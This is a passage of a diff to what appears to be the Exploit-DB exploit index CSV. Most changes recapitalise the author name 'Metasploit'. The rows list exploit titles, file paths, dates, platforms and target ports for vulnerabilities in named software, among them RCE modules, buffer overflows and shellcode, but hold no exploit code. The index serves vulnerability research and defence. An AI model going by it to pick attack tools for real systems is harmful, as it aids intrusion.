XSS",2010-03-23,kaMtiEz,php,webapps,0 33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Parameter Local File Include",2010-03-17,7Safe,php,webapps,0 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0 @@ -30437,9 +30437,9 @@ id,file,description,date,author,platform,type,port 33785,platforms/jsp/webapps/33785.txt,"agXchange ESM 'ucquerydetails.jsp' Cross-Site Scripting",2010-03-23,Lament,jsp,webapps,0 33786,platforms/multiple/remote/33786.txt,"Cafu 9.06 - Multiple Remote Vulnerabilities",2010-03-23,"Luigi Auriemma",multiple,remote,0 33788,platforms/php/webapps/33788.pl,"phpAuthent 0.2.1 - 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,php,webapps,0 -33789,platforms/multiple/remote/33789.rb,"Java Debug Wire Protocol Remote Code Execution",2014-06-17,metasploit,multiple,remote,8000 -33790,platforms/windows/remote/33790.rb,"Easy File Management Web Server Stack Buffer Overflow",2014-06-17,metasploit,windows,remote,80 -33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit",2014-06-17,metasploit,arm,local,0 +33789,platforms/multiple/remote/33789.rb,"Java Debug Wire Protocol Remote Code Execution",2014-06-17,Metasploit,multiple,remote,8000 +33790,platforms/windows/remote/33790.rb,"Easy File Management Web Server Stack Buffer Overflow",2014-06-17,Metasploit,windows,remote,80 +33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit",2014-06-17,Metasploit,arm,local,0 33792,platforms/hardware/webapps/33792.txt,"Motorola SBG901 Wireless Modem - CSRF",2014-06-17,"Blessen Thomas",hardware,webapps,0 33793,platforms/php/webapps/33793.txt,"Kasseler CMS News Module 'id' Parameter SQL Injection",2010-03-23,Palyo34,php,webapps,0 33794,platforms/php/webapps/33794.txt,"Multiple SpringSource Products Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 @@ -30456,7 +30456,7 @@ id,file,description,date,author,platform,type,port 33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0 34141,platforms/php/webapps/34141.txt,"AneCMS 1.x - 'modules/blog/index.php' SQL Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 33976,platforms/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting",2010-05-11,"High-Tech Bridge SA",php,webapps,0 -33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888 +33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,Metasploit,multiple,remote,8888 33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 @@ -30466,7 +30466,7 @@ id,file,description,date,author,platform,type,port 33814,platforms/php/webapps/33814.txt,"Piwik <= 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0 33816,platforms/multiple/remote/33816.pl,"Miranda IM <= 0.8.16 Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 -33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,metasploit,windows,remote,8080 +33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,Metasploit,windows,remote,8080 33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0 @@ -30488,7 +30488,7 @@ id,file,description,date,author,platform,type,port 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0 -33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0 +33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,Metasploit,windows,remote,0 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33998,platforms/php/webapps/33998.html,"JoomlaTune JComments 2.1 Joomla! Component - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 @@ -30510,9 +30510,9 @@ id,file,description,date,author,platform,type,port 34145,platforms/unix/dos/34145.txt,"Python <= 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 -33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,metasploit,hardware,remote,80 -33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80 -33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007 +33862,platforms/hardware/remote/33862.rb,"D-Link authentication.cgi Buffer Overflow",2014-06-24,Metasploit,hardware,remote,80 +33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,Metasploit,hardware,remote,80 +33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,Metasploit,linux,remote,40007 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0 33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0 34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injection Vulnerabilities",2010-06-14,"High-Tech Bridge SA",php,webapps,0 @@ -30535,9 +30535,9 @@ id,file,description,date,author,platform,type,port 33888,platforms/php/webapps/33888.txt,"ProArcadeScript 'search.php' Cross-Site Scripting",2010-04-27,Sid3^effects,php,webapps,0 33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-04-27,indoushka,php,webapps,0 33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",windows,remote,0 -33891,platforms/java/remote/33891.rb,"HP AutoPass License Server File Upload",2014-06-27,metasploit,java,remote,5814 -33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0 -33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0 +33891,platforms/java/remote/33891.rb,"HP AutoPass License Server File Upload",2014-06-27,Metasploit,java,remote,5814 +33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,Metasploit,windows,local,0 +33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,Metasploit,windows,local,0 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 @@ -30582,7 +30582,7 @@ id,file,description,date,author,platform,type,port 33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 - Remote Denial of Service",2010-04-29,"Bisphemol A",windows,dos,0 33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection",2010-02-09,JIKO,php,webapps,0 33988,platforms/php/remote/33988.txt,"PHP 5.x (5.3.x <= 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 -33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,metasploit,windows,remote,9002 +33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet Arbitrary File Upload",2014-07-07,Metasploit,windows,remote,9002 33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS",2014-07-02,Provensec,php,webapps,80 33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta ",asp,webapps,0 @@ -30623,8 +30623,8 @@ id,file,description,date,author,platform,type,port 33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 -33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,metasploit,multiple,remote,80 -33991,platforms/php/remote/33991.rb,"WordPress MailPoet - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,metasploit,php,remote,80 +33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,Metasploit,multiple,remote,80 +33991,platforms/php/remote/33991.rb,"WordPress MailPoet - (wysija-newsletters) Unauthenticated File Upload",2014-07-07,Metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injection Vulnerabilities",2010-05-17,podatnik386,asp,webapps,0 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps,0 33994,platforms/php/webapps/33994.txt,"PonVFTP Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0 @@ -30640,7 +30640,7 @@ id,file,description,date,author,platform,type,port 34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010 +34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,Metasploit,windows,remote,20010 34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0 34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0 @@ -30676,7 +30676,7 @@ id,file,description,date,author,platform,type,port 34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script 'index.php' Cross-Site Scripting",2010-05-26,indoushka,php,webapps,0 34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' Parameter SQL Injection",2010-05-27,"sniper ip",php,webapps,0 34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 - Multiple Cross-Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0 -34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote,0 +34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 - (build 144) Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote,0 34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 - 'pbx/gate' Cross-Site Request Forgery",2010-05-26,"John Leitch",multiple,remote,0 34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal",2010-05-27,"John Leitch",windows,remote,0 @@ -30690,9 +30690,9 @@ id,file,description,date,author,platform,type,port 34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0 34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 -34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,metasploit,hardware,remote,80 -34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,metasploit,hardware,remote,80 -34065,platforms/hardware/remote/34065.rb,"D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,metasploit,hardware,remote,1900 +34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 +34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,Metasploit,hardware,remote,80 +34065,platforms/hardware/remote/34065.rb,"D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",2014-07-14,Metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 34067,platforms/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,php,webapps,0 34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities",2010-01-01,"Truong Thao Nguyen",php,webapps,0 @@ -30776,11 +30776,11 @@ id,file,description,date,author,platform,type,port 34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (64-bit) - Stored XSS",2014-07-25,"Dolev Farhi",multiple,webapps,0 34166,platforms/php/webapps/34166.txt,"KubeSupport 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 -34167,platforms/win_x86/local/34167.rb,"MQAC.sys Arbitrary Write Privilege Escalation",2014-07-25,metasploit,win_x86,local,0 +34167,platforms/win_x86/local/34167.rb,"MQAC.sys Arbitrary Write Privilege Escalation",2014-07-25,Metasploit,win_x86,local,0 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0 -34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,metasploit,multiple,remote,0 +34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,Metasploit,multiple,remote,0 34172,platforms/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service",2014-07-27,Z3ro0ne,hardware,dos,0 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI",2014-07-27,"black hat",php,webapps,0 34174,platforms/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Buffer Overflow",2010-08-18,"Luigi Auriemma",windows,remote,0 @@ -30850,7 +30850,7 @@ id,file,description,date,author,platform,type,port 34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080 -34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,metasploit,linux,remote,443 +34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,Metasploit,linux,remote,443 34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 (data.php) - Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos,0 @@ -30930,14 +30930,14 @@ id,file,description,date,author,platform,type,port 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34324,platforms/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Parameter Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk products_search.php search_category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 -34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution",2014-08-14,metasploit,linux,remote,80 -34334,platforms/win_x86-64/remote/34334.rb,"VirtualBox 3D Acceleration Virtual Machine Escape",2014-08-14,metasploit,win_x86-64,remote,0 -34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions - VBoxGuest.sys Privilege Escalation",2014-08-13,metasploit,windows,local,0 +34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution",2014-08-14,Metasploit,linux,remote,80 +34334,platforms/win_x86-64/remote/34334.rb,"VirtualBox 3D Acceleration Virtual Machine Escape",2014-08-14,Metasploit,win_x86-64,remote,0 +34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions - VBoxGuest.sys Privilege Escalation",2014-08-13,Metasploit,windows,local,0 34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection Vulnerabilities",2009-12-17,bi0,asp,webapps,0 34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0 -34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020 +34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,Metasploit,windows,remote,8020 34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0 34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0 34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Include",2010-07-18,eidelweiss,php,webapps,0 @@ -30979,7 +30979,7 @@ id,file,description,date,author,platform,type,port 34387,platforms/php/webapps/34387.txt,"Cetera eCommerce Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0 34388,platforms/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Parameter Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps,0 34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps Cross-Site Scripting and HTML Injection Vulnerabilities",2010-07-27,Matt,php,webapps,0 -34390,platforms/php/remote/34390.rb,"HybridAuth install.php PHP Code Execution",2014-08-21,metasploit,php,remote,80 +34390,platforms/php/remote/34390.rb,"HybridAuth install.php PHP Code Execution",2014-08-21,Metasploit,php,remote,80 34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0 34392,platforms/php/webapps/34392.txt,"MyIT CRM 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0 34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component - 'controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0 @@ -31033,7 +31033,7 @@ id,file,description,date,author,platform,type,port 34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0 34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 include/ajax/blogInfo.php asd Parameter XSS",2009-08-31,Inj3ct0r,php,webapps,0 34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80 -34448,platforms/multiple/remote/34448.rb,"Firefox WebIDL Privileged Javascript Injection",2014-08-28,metasploit,multiple,remote,0 +34448,platforms/multiple/remote/34448.rb,"Firefox WebIDL Privileged Javascript Injection",2014-08-28,Metasploit,multiple,remote,0 34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0 34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 @@ -31090,7 +31090,7 @@ id,file,description,date,author,platform,type,port 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 -34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466 +34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,Metasploit,windows,remote,5466 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash PoC",2014-12-23,"Drozdova Liudmila",windows,dos,0 @@ -31225,9 +31225,9 @@ id,file,description,date,author,platform,type,port 34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 -34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80 -34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400 -34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000 +34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,Metasploit,multiple,remote,80 +34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,Metasploit,multiple,remote,8400 +34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,Metasploit,java,remote,9000 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - CSRF",2014-09-15,"William Costa",linux,webapps,8090 34673,platforms/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,php,webapps,0 34674,platforms/php/webapps/34674.txt,"WebStatCaffe stat/mostvisitpage.php nodayshow Parameter XSS",2009-08-29,Moudi,php,webapps,0 @@ -31308,8 +31308,8 @@ id,file,description,date,author,platform,type,port 34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80 34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 -34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 Command Injection",2014-09-24,metasploit,windows,remote,3000 -34757,platforms/windows/remote/34757.rb,"Advantech WebAccess dvs.ocx GetColor Buffer Overflow",2014-09-24,metasploit,windows,remote,0 +34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 Command Injection",2014-09-24,Metasploit,windows,remote,3000 +34757,platforms/windows/remote/34757.rb,"Advantech WebAccess dvs.ocx GetColor Buffer Overflow",2014-09-24,Metasploit,windows,remote,0 34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Path Traversal LFI",2014-09-24,Securify,php,webapps,80 34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Stored XSS",2014-09-24,"Kenneth F. Belva",php,webapps,80 @@ -31400,11 +31400,11 @@ id,file,description,date,author,platform,type,port 34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - CSRF",2014-10-02,"Krusty Hack",php,webapps,80 34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0 34861,platforms/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,php,webapps,80 -34862,platforms/linux/remote/34862.rb,"Pure-FTPd External Authentication Bash Environment Variable Code 